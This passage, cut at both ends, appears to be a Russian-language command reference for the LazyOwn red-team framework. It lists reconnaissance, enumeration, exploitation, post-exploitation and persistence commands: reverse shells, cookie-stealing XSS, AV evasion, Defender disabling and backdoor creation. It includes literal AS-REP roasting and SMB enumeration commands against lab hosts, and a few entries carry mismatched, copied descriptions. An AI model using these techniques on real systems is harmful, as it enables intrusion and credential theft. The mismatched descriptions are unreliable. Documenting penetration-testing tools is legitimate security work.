Фаза: разведка | Источник: cli/commands/recon_migrated.py

Получает и отображает возможности файлов в системе.

gospider

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Попробуйте gospider для веб-сканирования (обхода сайтов).

graudit

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет команду graudit для статического анализа кода с указанными параметрами.

httprobe

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет инструмент httprobe для проверки доменов на наличие работающих HTTP и HTTPS серверов.

ipinfo

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Получает подробную информацию об IP-адресе с помощью ARIN API.

launchpad

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Ищет пакеты на Launchpad на основе предоставленного поискового запроса и извлекает кодовые имена из результатов. Дистрибутив извлекается из поискового запроса.

metabigor

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет команды Metabigor для задач OSINT и сканирования с управляемым вводом или предопределенными аргументами.

openssl_sclient

Фаза: разведка | Источник: cli/commands/recon.py

Использует openssl s_client для подключения к указанному хосту и порту, что позволяет тестировать и отлаживать SSL/TLS-соединения.

ping

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет ping для проверки доступности хоста и определения операционной системы на основе значений TTL.

ports

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Перечисляет все открытые TCP и UDP порты в локальной системе.

proxy

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Запускает небольшой прокси-сервер для изменения HTTP-запросов на лету.

recon

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет разведку по указанному self.params['domain'] с помощью crt.sh (цель должна быть видна в интернете), pup, httprobe и EyeWitness.

serveralive2

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Команда serveralive2: использует Impacket для подключения к удаленному интерфейсу MSRPC и получает привязки сервера.

sherlock

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет инструмент Sherlock для поиска имен пользователей в социальных сетях.

sslscan

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет SSL-сканирование указанного удаленного хоста.

surface

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Отображает граф сетевой поверхности в терминале.

tcpdump_capture

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Запускает захват пакетов с помощью tcpdump на указанном интерфейсе.

tcpdump_icmp

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Запускает tcpdump для захвата ICMP-трафика на указанном интерфейсе.

trace

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Трассирует DNS-информацию для заданного self.params['domain'] с помощью службы FreeDNS. (используется IP FreeDNS, а не ваш IP)

trufflehog

Phase: recon | Source: cli/commands/recon_migrated.py

Запускает trufflehog для поиска секретов в указанном URL Git-репозитория.

tshark_analyze

Phase: recon | Source: cli/commands/recon_migrated.py

Анализирует файл захвата пакетов с помощью tshark на основе указанного IP-адреса удаленного хоста.

waybackmachine

Phase: recon | Source: cli/commands/recon_migrated.py

Получает URL-адреса из Wayback Machine для заданного веб-сайта.

whatweb

Phase: recon | Source: cli/commands/recon.py

Выполняет сканирование для определения технологий веб-сайта с помощью whatweb.

windapsearchscrapeusers

Phase: recon | Source: cli/commands/recon_migrated.py

Извлекает имена пользователей из JSON-вывода, созданного go-windapsearch, и добавляет их

02. Сканирование и перечисление

ad_ldap_enum

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет ad-ldap-enum для перечисления объектов Active Directory (пользователи, группы, компьютеры)

allin

Phase: enum | Source: cli/commands/scan_migrated.py

Запускает инструмент AlliN.py с различными режимами сканирования и параметрами.

amass

Phase: enum | Source: cli/commands/scan.py

Выполняет Amass для пассивного перечисления заданного домена.

arjun

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет сканирование Arjun по указанному URL для обнаружения параметров.

arpscan

Phase: enum | Source: cli/commands/scan.py

Выполняет ARP-сканирование с помощью arp-scan.

batchnmap

Phase: enum | Source: cli/commands/recon.py

Запускает внутренний модуль modules/lazynmap.sh для множественных Nmap-сканирований.

bbot

Phase: enum | Source: cli/commands/scan.py

Выполняет сканирование BBOT для выполнения различных задач разведки.

blazy

Phase: enum | Source: cli/commands/scan_migrated.py

Команда blazy: устанавливает и запускает blazy для сканирования веб-приложений на множественные уязвимости.

bloodhound

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет перечисление LDAP с помощью bloodhound-python, используя учетные данные из файла.

breacher

Phase: enum | Source: cli/commands/scan_migrated.py

Команда breacher: устанавливает и запускает Breacher для поиска страниц входа администратора и уязвимостей EAR.

certipy

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет инструмент Certipy для взаимодействия со службами сертификации Active Directory.

certipy_ad

Phase: enum | Source: cli/commands/scan_migrated.py

Запускает certipy-ad против служб сертификации Active Directory.

changeme

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет сканирование changeme по указанному целевому URL или хосту.

cme

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет CrackMapExec (CME) для перечисления SMB и попыток аутентификации против цели.

davtest

Phase: enum | Source: cli/commands/scan_migrated.py

Проверяет конфигурации сервера WebDAV с помощью davtest.

dirsearch

Phase: enum | Source: cli/commands/scan.py

Запускает инструмент dirsearch для перечисления каталогов и файлов по указанному URL.

dmitry

Phase: enum | Source: cli/commands/scan.py

Эта функция формирует и выполняет команду для инструмента 'dmitry'.

enum4linux

Phase: enum | Source: cli/commands/enum.py

Выполняет перечисление информации с целевой системы Linux/Unix с помощью enum4linux.

enum4linux_ng

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет перечисление информации с целевой системы с помощью enum4linux-ng.

evil_ssdp

Phase: enum | Source: cli/commands/scan_migrated.py

Запускает evil-ssdp с различными параметрами и выбранными пользователем шаблонами.

feroxbuster

Phase: enum | Source: cli/commands/scan.py

Команда feroxbuster: устанавливает и запускает Feroxbuster для выполнения принудительного просмотра и перебора каталогов.

finger_user_enum

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет инструмент finger-user-enum для перечисления пользователей на целевом хосте.

fuzz

Phase: enum | Source: cli/commands/scan_migrated.py

Выполняет скрипт фаззинга веб-сервера с параметрами, предоставленными пользователем.

getnpusers

Phase: enum | Source: cli/commands/enum.py

sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt

gobuster

Фаза: enum | Источник: cli/commands/scan.py

Использует gobuster для фаззинга каталогов и виртуальных хостов на основе предоставленных параметров. Поддерживает перечисление каталогов и обнаружение виртуальных хостов.

hostdiscover

Фаза: enum | Источник: cli/commands/scan.py

Обнаруживает активные хосты в подсети, выполняя ping-свип.

hound

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент hound. Hound — это простой и легкий инструмент для сбора информации и захвата точных GPS-координат.

kerbrute

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Kerbrute для перечисления учетных записей пользователей на указанном контроллере домена self.params['domain'].

lazynmap

Фаза: enum | Источник: cli/commands/recon.py

Запускает внутренний модуль modules/lazynmap.sh в целевом режиме.

ldapdomaindump

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выгружает информацию LDAP с помощью ldapdomaindump, используя учетные данные из файла.

ldapsearch

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет поиск LDAP по целевому удаленному хосту (self.params['rhost']) и сохраняет результаты.

lookupsid

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Impacket lookupsid для перечисления SID на целевой системе.

lookupsid_py

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент LookupSID для перечисления SID на целевой системе.

loxs

Фаза: enum | Источник: cli/commands/scan_migrated.py

Команда loxs: устанавливает и запускает Loxs для сканирования веб-приложений на множественные уязвимости.

lynis

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет аудит Lynis на указанной удаленной системе.

magicrecon

Фаза: enum | Источник: cli/commands/scan.py

Команда magicrecon: автоматизирует настройку и использование MagicRecon для выполнения различных типов разведки и сканирования уязвимостей на указанных целях.

mqtt_check_py

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент проверки MQTT для проверки учетных данных на целевой системе с возможностью использования SSL.

nbtscan

Фаза: enum | Источник: cli/commands/recon.py

Выполняет сетевое сканирование с помощью nbtscan для обнаружения имен и адресов NetBIOS в указанном диапазоне.

net_rpc_addmem

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет команду net rpc group addmem для добавления пользователя в указанную группу в Active Directory.

netexec

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет netexec с различными параметрами для операций с сетевыми протоколами.

netview

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Impacket netview для вывода списка сетевых ресурсов на указанной цели.

nikto

Фаза: enum | Источник: cli/commands/recon.py

Запускает инструмент nikto для сканирования веб-сервера на уязвимости на указанном целевом хосте.

nmapscript

Фаза: enum | Источник: cli/commands/scan.py

Выполняет сканирование Nmap с использованием указанного скрипта и порта.

nuclei

Фаза: enum | Источник: cli/commands/scan.py

Выполняет сканирование Nuclei на указанном целевом URL или хосте.

odat

Фаза: enum | Источник: cli/commands/scan_migrated.py

Команда odat: запускает модуль ODAT sidguesser для подбора SID Oracle на целевой базе данных Oracle.

openredirex

Фаза: enum | Источник: cli/commands/scan_migrated.py

Команда openredirex: клонирует, устанавливает и запускает OpenRedirex для тестирования уязвимостей открытого перенаправления.

osmedeus

Фаза: enum | Источник: cli/commands/scan.py

Выполняет сканирование Osmedeus с управляемым вводом для различных сценариев сканирования.

parsero

Фаза: enum | Источник: cli/commands/scan_migrated.py

Выполняет сканирование parsero на указанном целевом URL или хосте.

parth

Фаза: enum | Источник: cli/commands/scan_migrated.py

Команда parth: устанавливает и запускает Parth для обнаружения уязвимых URL и параметров.

portdiscover

Фаза: enum | Источник: cli/commands/scan.py

Сканирует все порты на указанном хосте для выявления открытых портов.

portservicediscover

Фаза: enum | Источник: cli/commands/scan.py

Сканирует все порты на указанном хосте для выявления открытых портов и связанных с ними служб.

pre2k

Фаза: enum | Источник: cli/commands/scan_migrated.py Выполняет инструмент pre2k для запроса self.params['domain'] на предмет учётных записей компьютеров до Windows 2000 или для передачи списка имён хостов для проверки аутентификации.

pykerbrute

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда pykerbrute: автоматизирует установку и выполнение PyKerbrute для перебора учётных записей Active Directory с использованием предварительной аутентификации Kerberos.

rdp_check_py

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент проверки RDP для проверки учётных данных или аутентификации на основе хэша на целевой системе.

rpcclient

Фаза: перечисление | Источник: cli/commands/enum.py

Выполняет команду rpcclient для взаимодействия с удалённой системой Windows через RPC (удалённый вызов процедур) с использованием анонимных учётных данных.

rpcdump

Фаза: перечисление | Источник: cli/commands/enum.py

Выполняет скрипт rpcdump.py для сбора информации о RPC-сервисах с целевого хоста.

rpcmap_py

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда rpcmap_py: выполняет команды rpcmap.py для перечисления интерфейсов MSRPC.

samrdump

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Запускает impacket-samrdump для сбора данных SAM с указанных портов.

sawks

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент Swaks (швейцарский армейский нож для SMTP) для отправки тестовых писем с целью имитации фишинга.

sessionssh

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет команду для вывода списка активных SSH-подключений.

skipfish

Фаза: перечисление | Источник: cli/commands/scan.py

Эта функция выполняет инструмент сканирования веб-безопасности Skipfish.

smbattack

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Сканирует хосты с открытым SMB-сервисом на порту 445 в указанной целевой сети.

smbclient

Фаза: перечисление | Источник: cli/commands/enum.py

Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:

smbclient_impacket

Фаза: перечисление | Источник: cli/commands/enum.py

Взаимодействует с SMB-ресурсами с помощью команды smbclient для выполнения следующих операций:

smbclient_py

Фаза: перечисление | Источник: cli/commands/enum.py

Взаимодействует с SMB-ресурсами с помощью команды smbclient.py для выполнения следующих операций:

smbmap

Фаза: перечисление | Источник: cli/commands/enum.py

smbmap -H 10.10.10.3 [ОПЦИИ]

smtpuserenum

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Перечисляет пользователей SMTP с помощью инструмента smtp-user-enum методом VRFY.

snmpcheck

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет проверку SNMP на указанном целевом хосте.

snmpwalk

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет проверку SNMP на указанном целевом хосте.

swaks

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Отправляет электронное письмо с помощью swaks (швейцарский армейский нож для SMTP).

vscan

Фаза: перечисление | Источник: cli/commands/scan.py

Выполняет сканирование портов с помощью vscan с заданными параметрами.

wfuzz

Фаза: перечисление | Источник: cli/commands/recon.py

Использует wfuzz для выполнения фаззинга на основе предоставленных параметров. Эта функция поддерживает различные опции для фаззинга каталогов и файлов.

windapsearch

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Выполняет инструмент windapsearch для перечисления домена Active Directory через LDAP-запросы.

wpscan

Фаза: перечисление | Источник: cli/commands/scan_migrated.py

Команда wpscan: устанавливает и запускает WPScan для сканирования уязвимостей WordPress.

03. Эксплуатация

aclpwn_py

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент aclpwn.py для поиска и эксплуатации путей ACL для повышения привилегий в среде Active Directory.

adcs_check

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Проверяет службы сертификации Active Directory на наличие уязвимостей ESC1-ESC8.

addspn_py

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент addspn.py для управления именами субъектов служб (SPN) в учётных записях Active Directory через LDAP.

auto_pwn

Фаза: эксплуатация | Источник: cli/commands/pwn.py

Запускает полную автоматизированную цепочку эксплуатации против цели.

autoblody

Фаза: эксплуатация | Источник: cli/commands/exploit_migrated.py Выполняет инструмент autobloody для автоматизации путей повышения привилегий в Active Directory.

cacti_exploit

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Автоматизирует эксплуатацию уязвимости Cacti версии 1.2.26.

chain

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Запускает автономную цепочку эксплуатации: разведка -> уязвимость -> эксплойт -> пост-эксплойт.

commix

Фаза: эксплойт | Источник: cli/commands/exploit.py

Запускает commix для тестирования внедрения команд.

cp

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Копирует файл из каталога ExploitDB в каталог sessions.

createcookie

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Создаёт файл cookie.txt в каталоге sessions с указанным значением cookie.

createdll

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Создаёт DLL-файл для Windows с помощью MinGW-w64 или Blazor DLL для Linux.

digdug

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет Dig Dug для увеличения размера исполняемого файла, используя предварительно настроенные параметры.

download_exploit

Фаза: эксплойт | Источник: cli/commands/exploit.py

Загружает и настраивает эксплойт, при необходимости обслуживая его через HTTP.

downloader

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Генерирует команду загрузчика для файлов в каталоге sessions.

eternal

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Автоматизирует процесс эксплуатации EternalBlue (MS17-010) с использованием Metasploit.

excelntdonut

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Генерирует макрос Excel 4.0 (XLM) из предоставленного исходного файла C# с помощью EXCELntDonut.

exploit_chain

Фаза: эксплойт | Источник: cli/commands/pwn.py

Многошаговая цепочка эксплойтов на основе ИИ с запасными стратегиями.

exploit_recommend

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Рекомендация эксплойтов на основе ИИ — сопоставляет обнаруженные сервисы с CVE.

filtering

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Применяет различные методы фильтрации к заданной командной строке, изменяя каждый символ или слово соответствующим образом.

gets4uticket_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент gets4uticket.py из PKINITtools для запроса сервисного билета S4U2Self с использованием Kerberos.

gettgtpkinit_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент gettgtpkinit.py из PKINITtools для запроса TGT с использованием Kerberos PKINIT с сертификатом PFX или PEM.

greatSCT

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент GreatSCT для генерации полезных нагрузок, обходящих антивирусные решения и списки разрешённых приложений.

img2cookie

Фаза: эксплойт | Источник: cli/commands/exploit.py

Генерирует XSS-полезную нагрузку, которая крадёт cookie через тег изображения.

jwt_tool

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Использует jwt_tool для анализа, модификации или эксплуатации JSON Web Tokens (JWT).

krbrelayx_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент krbrelayx.py для ретрансляции Kerberos или злоупотребления неограниченной делегацией.

kusa

Фаза: эксплойт | Источник: cli/commands/exploit.py

Запускает генератор полезных нагрузок Kusanagi.

lazypwn

Фаза: эксплойт | Источник: cli/commands/exploit.py

Выполняет автоматизированный скрипт эксплуатации LazyPwn.

lfi

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эксплуатирует потенциальную уязвимость локального включения файлов (LFI) путём создания

lol

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эксплуатирует цель, внедряя вредоносную полезную нагрузку и собирая информацию об администраторе.

lolbas_use

Фаза: эксплойт | Источник: cli/commands/pwn.py

Выполняет конкретную технику LOLBAS.

ms08_067_netapi

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

SMB CVE-2008-4250. Уязвимость с использованием модуля ms08_067_netapi из Metasploit.

ntpdate

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Синхронизирует системные часы с указанным NTP-сервером.

owneredit


Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент Impacket owneredit для изменения владельца объектов Active Directory.

padbuster

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет команду PadBuster для атак padding oracle.

powerserver

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эта функция генерирует PowerShell-скрипт, который получает обратную оболочку (reverse shell) по HTTP на системе Windows.

printerbug_py

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент printerbug.py для запуска ошибки SpoolService через обратное RPC-подключение.

psexec

Фаза: эксплойт | Источник: cli/commands/enum.py

Выполняет инструмент Impacket PSExec для попытки удаленного выполнения на указанной цели.

psexec_py

Фаза: эксплойт | Источник: cli/commands/enum.py

Выполняет инструмент Impacket PSExec для попытки удаленного выполнения на указанной цели.

py3ttyup

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Копирует команду Python reverse shell в буфер обмена.

pyautomate

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Автоматизирует выполнение инструментов pwntomate на XML-файлах конфигурации.

pyoracle2

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент pyOracle2 для выполнения атак padding oracle.

pywhisker

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент pyWhisker для манипулирования атрибутом msDS-KeyCredentialLink целевого пользователя или компьютера.

rejetto_hfs_exec

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

HttpFileServer версии 2.3. Уязвимый с использованием модуля rejetto_hfs_exec из metasploit.

rev

Фаза: эксплойт | Источник: cli/commands/exploit.py

Копирует однострочную команду reverse shell в буфер обмена.

seo

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет веб-скан для снятия отпечатков (fingerprinting) SEO с помощью lazyseo.py.

sharpshooter

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет фреймворк создания полезной нагрузки (payload) для получения и выполнения произвольного исходного кода C#.

shellfire

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Запускает Shellfire с различными опциями и позволяет генерировать полезные нагрузки.

shellshock

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет атаку Shellshock против цели.

sireprat

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Команда sireprat: автоматизирует настройку и использование SirepRAT для выполнения различных атак на устройство Windows IoT Core.

sqli

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Запрашивает у пользователя URL, базу данных, таблицу и столбцы, а затем выполняет Python-скрипт.

sqli_mssql_test

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Инициирует обратную оболочку MSSQL, запуская HTTP-сервер для обработки входящих подключений и кражи данных.

sqlmap

Фаза: эксплойт | Источник: cli/commands/exploit.py

Запускает SQLMap против целевого URL для тестирования SQL-инъекций.

sqsh

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет инструмент Impacket sqsh для изменения владельца объектов Active Directory.

ss

Фаза: эксплойт | Источник: cli/commands/recon.py

Ищет все источники эксплойтов и сопоставляет результаты со следующей командой LazyOwn.

sshexploit

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Эксплуатирует уязвимость OpenSSH CVE-2023-38408 через функцию PKCS#11 ssh-agent.

stealth_on

Фаза: эксплойт | Источник: cli/commands/pwn.py

Включает скрытый режим для последующих операций.

template_helper_serializer

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Обрабатывает создание и сериализацию вспомогательного шаблона.

ticketer

Фаза: эксплойт | Источник: cli/commands/exploit.py

Запускает Impacket ticketer для создания золотых/серебряных билетов.

unicode_WAFbypass

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Мы открываем Netcat-слушатель на порту 443 и пытаемся эксплуатировать десериализацию NodeJS, отправляя

upload_bypass

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py Command upload_bypass: Автоматизирует установку и выполнение Upload_Bypass для проведения тестов на обход загрузки файлов.

utf

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Кодирует заданную полезную нагрузку в UTF-16 escape-последовательности.

winbase64payload

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Создает полезную нагрузку в кодировке base64 специально для Windows для выполнения команды PowerShell или загрузки файла с использованием self.params['lhost'].

wrapper

Фаза: эксплойт | Источник: cli/commands/exploit.py

Копирует полезные нагрузки LFI php-wrapper в буфер обмена.

www

Фаза: эксплойт | Источник: cli/commands/exploit.py

Запускает простой HTTP-сервер на настроенном порту для раздачи полезных нагрузок.

xss

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Выполняет процедуру тестирования уязвимости XSS (межсайтовый скриптинг).

xsstrike

Фаза: эксплойт | Источник: cli/commands/exploit_migrated.py

Команда xsstrike: Устанавливает и запускает XSStrike для поиска XSS-уязвимостей.

04. Пост-эксплуатация

add2find

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Добавляет новую пользовательскую команду в систему 'find', сохраняется в user_commands.json.

adversary

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Эмулятор противника LazyOwn RedTeam, вы можете настроить своих собственных противников в adversary.json.

adversary_yaml

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Выполнить противника из YAML в lazyadversaries/*.yaml.

aes_pe

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Шифрование с помощью AES и случайного ключа в PE EXE файл для использования с загрузчиками.

apt_proxy

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Настраивает локальную машину с доступом в Интернет для работы в качестве APT-прокси для машины без доступа в Интернет.

apt_repo

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Создает полный локальный APT-репозиторий с улучшенным разрешением зависимостей.

atomic_lazyown

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Выполнение атомарных red-team тестов через LazyOwn.

bin2shellcode

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует бинарный файл в строку шеллкода в формате C или Nim.

convert_remcomsvc_from_file

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует байтовую строку Python REMCOMSVC из remcomsvc.py в формат среза байтов Golang, выводит образец и сохраняет его в sessions/remcomsvc.go. см. lazyaddon GoPEInjection.

cports

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Генерирует команду для отображения TCP и UDP портов и копирует её в буфер обмена.

create_synthetic

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Создает базовый синтетический плейбук из Nmap CSV, когда LLM не работает.

createpayload

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Генерирует обфусцированную полезную нагрузку для обхода обнаружения AV с помощью инструмента payloadGenerator. спасибо smokeme.

d3monizedshell

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Выполняет инструмент D3m0n1z3dShell для обеспечения персистентности в Linux.

disableav

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Создает VBS-скрипт для попытки отключения Windows Defender.

exe2bin

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует файл .exe в бинарный файл.

exe2donutbin

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует файл .exe в бинарный файл donut.

extract_yaml

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Извлекает YAML из существующего отладочного файла и пытается создать плейбук.

find

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Автоматизирует выполнение команд на основе списка алиасов и команд.

follina

Фаза: постэксплуатация | Источник: cli/commands/postexp.py

Запускает настройку эксплойта Follina (CVE-2022-30190).

hex2shellcode

Фаза: постэксплуатация | Источник: cli/commands/postexp_migrated.py

Преобразует сырую шестнадцатеричную полезную нагрузку из msfvenom в совместимый с NASM формат шеллкода. Настраивает локальную машину с доступом в интернет для работы в качестве прокси для машины без доступа в интернет.

issue_command_to_c2

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Выполняет команду на клиенте через C2. Для загрузки: вы должны поместить файл в sessions/temp_upload или использовать команду download_c2.

lazywebshell

Фаза: postexp | Источник: cli/commands/postexp.py

Запускает веб-шелл сервер LazyOwn на порту 8888.

mimikatzpy

Фаза: postexp | Источник: cli/commands/postexp.py

Запускает Mimikatz через Python (в стиле impacket).

ofuscate_payload

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.

ofuscate_string

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Обфусцирует строку в код Go.

ofuscatesh

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Обфусцирует shell-скрипт, кодируя его в Base64, и подготавливает команду для декодирования и выполнения.

ofuscatorps1

Фаза: postexp | Источник: cli/commands/postexp.py

Обфусцирует PowerShell-скрипт.

path2hex

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Преобразует путь к бинарному файлу в x64 little-endian шестнадцатеричный код для инъекции шеллкода.

pezorsh

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Выполняет инструмент PEzor для упаковки исполняемых файлов или шеллкода с пользовательскими конфигурациями.

pip_proxy

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Настраивает локальную машину с доступом в интернет для работы в качестве pip-прокси для машины без доступа в интернет.

pip_repo

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Настраивает локальный pip-репозиторий для предоставления Python-пакетов для установки на скомпрометированной машине без доступа в интернет.

powershell_cmd_stager

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Генерирует и выполняет PowerShell командный stager для запуска .ps1 скрипта.

rmfromfind

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Удаляет пользовательскую команду по индексу (как показано в 'find').

rubeus

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Копирует команду в буфер обмена для загрузки и запуска Rubeus.

scavenger

Фаза: postexp | Источник: cli/commands/postexp.py

Запускает сборщик данных пост-эксплуатации Scavenger.

scp

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Копирует локальную директорию "sessions" на удалённый хост с помощью scp, используя sshpass для автоматической аутентификации.

service_ssh

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Создаёт файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.

sessionsshstrace

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Подключает strace к запущенному процессу и записывает вывод в файл.

shellcode

Фаза: postexp | Источник: cli/commands/postexp.py

Генерация и управление шеллкодом.

shellcode2elf

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Преобразует шеллкод в ELF-файл и заражает его.

shellcode2sylk

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Преобразует шеллкод в формат SYLK и сохраняет результат в файл.

shellcode_search

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Ищет шеллкоды в API shell-storm по заданным ключевым словам.

ssh_cmd

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Выполняет удалённую команду через SSH, используя настроенного пользователя start_user. Смотрите help grisun0 для настройки пользователя-бэкдора.

yara_scan

Фаза: postexp | Источник: cli/commands/postexp_migrated.py

Сканирует файлы или директории с помощью YARA-правил на наличие вредоносных программ/IOC.

05. Постоянство (Persistence)

asprevbase64

Фаза: persist | Источник: cli/commands/persist_migrated.py

Создаёт ASP reverse shell полезную нагрузку в кодировке Base64 и копирует её в буфер обмена.

backdoor_factory

Фаза: persist | Источник: cli/commands/persist_migrated.py

Создаёт исполняемый файл с бэкдором с помощью backdoor-factory.

beaconcfg

